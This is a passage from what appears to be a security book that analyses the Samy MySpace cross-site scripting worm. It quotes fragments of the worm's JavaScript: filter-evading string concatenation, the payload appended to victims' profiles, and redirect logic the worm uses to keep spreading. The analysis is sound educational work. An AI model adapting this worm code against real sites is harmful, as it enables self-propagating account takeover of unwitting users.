replace('exp' + 'r)', 'exp' + 'r)' + singleQuote);
// The variable below holds a cute comment, the script injection, and the
// attack code. This string is added to the victim??™s profile page.
heroCommentWithWorm = ' but most of all, samy is my hero.
';
}
Next, the attack code checks whether it is running on http://profile.myspace.com or
www.myspace.com. If the script is running on http://profile.myspace.com, the script
redirects the user to reload the script (itself) from www.myspace.com. Generally, this is
done because of Same Domain Policy restrictions or the need to go to a different web
server that has different functionality.
// This is a redirect. Essentially, if the current page came from
// "profile.myspace.com", then the code below makes the identical
// request to
// "www.myspace.com". This could be due to some Same Domain Policy
58
// restriction.
if(location.hostname == 'profile.myspace.com') {
document.location='http://www.myspace.com' + location.pathname +
location.search;
} else {
// Now that we are on the correct "www.myspace.com", let's start
// spreading this worm. First, ensure that we have the friendID.
Pages:
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144